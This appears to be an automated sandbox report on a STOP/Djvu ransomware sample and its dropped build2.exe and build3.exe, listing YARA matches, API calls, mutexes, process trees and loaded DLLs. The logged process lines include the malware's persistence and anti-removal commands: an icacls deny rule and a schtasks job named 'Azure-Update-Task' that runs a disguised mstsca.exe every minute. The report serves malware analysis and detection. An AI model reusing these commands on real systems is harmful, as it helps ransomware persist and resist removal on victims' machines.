Source: Process Memory Space: mJVVW85CnW.exe PID: 6932, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: mJVVW85CnW.exe PID: 6984, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: mJVVW85CnW.exe PID: 6288, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: mJVVW85CnW.exe PID: 1516, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: mJVVW85CnW.exe PID: 7152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: mJVVW85CnW.exe PID: 6696, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@47/1472@8/5

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_0459C7C6 CreateToolhelp32Snapshot,Module32First,

0_2_0459C7C6

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

Jump to behavior

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: F:\	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Command line argument: F:\	1_2_00419F90

Source: mJVVW85CnW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000008.00000003.2002025367.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: mJVVW85CnW.exe

ReversingLabs: Detection: 39%

Source: mJVVW85CnW.exe	String found in binary or memory: set-addPolicy
Source: mJVVW85CnW.exe	String found in binary or memory: id-cmc-addExtensions
Source: mJVVW85CnW.exe	String found in binary or memory: set-addPolicy
Source: mJVVW85CnW.exe	String found in binary or memory: id-cmc-addExtensions
Source: mJVVW85CnW.exe	String found in binary or memory: set-addPolicy
Source: mJVVW85CnW.exe	String found in binary or memory: id-cmc-addExtensions
Source: mJVVW85CnW.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

File read: C:\Users\user\Desktop\mJVVW85CnW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe"
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe"
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe --Task
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe --Task
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe"
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe"
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe"
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\Desktop\mJVVW85CnW.exe "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe --Task
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe"
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Process created: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe"
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Process created: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Section loaded: bcp47langs.dll	Jump to behavior
